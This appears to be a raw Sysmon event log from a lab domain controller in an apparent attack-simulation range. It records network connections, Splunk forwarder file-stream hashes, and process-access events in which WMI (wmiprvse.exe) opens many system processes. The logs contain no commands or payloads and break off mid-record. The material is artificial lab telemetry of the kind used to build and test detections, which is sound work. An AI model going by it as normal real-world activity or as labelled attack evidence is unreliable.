354300x80000000000000001696818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:24.217{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55159-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 354300x80000000000000001696817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:23.389{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55158-false10.0.1.12-8000- 354300x80000000000000001696816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:23.247{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local55691- 23542300x80000000000000001696822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:33.927{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6747D231FE82B5CD0CE7750B1A95697D,SHA256=B01477F7378F19409D707C60A43E19F3726795C88A5C6E5CBAD2F2CF6135C452,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:33.489{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED945DFBDBD423F5497F5BEC8036BBD3,SHA256=F5B9BF998B4B8F8CD7AC6953CD9634C2383883EC591A0918919C69149EAB1FE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:34.521{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C901669FA17DE2A4FE0F2FA99A9DF3C2,SHA256=098900B57303C106ECF5399D9FB8D40A97FDF143496EDE97816ACD1B748AD8FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.570{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94357A6EAA33DB0C873B03D8CF4B23E3,SHA256=542E4135EBF68ABEE1BEEA1CF7931F5AF8320889556AEA4611443C129AA5DCC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:36.599{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53C6D199CFC30A10DDBE0D9BFB1F60CB,SHA256=DD57F77DCDBED7EFDFFB7F82D6EC4FAAD3B48E118EC2267787573E0E75B5D8DD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001696831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:37.802{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:37.802{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:37.802{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001696828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:37.614{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85701559F0C627FB888D75CD5B474673,SHA256=BF0FFC18F10343517FF4D916FEE4427C53FC04F6FE72BE59991839A8A7E6A7C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:29.389{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55160-false10.0.1.12-8000- 23542300x80000000000000001696826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:37.072{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F46B3560E42D3154984C03643EACC2E0,SHA256=7CDC487448691766530125118ED7326E253AFDC30C90F7A037AE033D18E89056,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:38.665{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6B1584A26B7AF6895D3719201AFCDF5,SHA256=B2FB0EA806E62F1C64646F3FE1199AC18C662FE00A8C19904B42C4FBA290C60B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\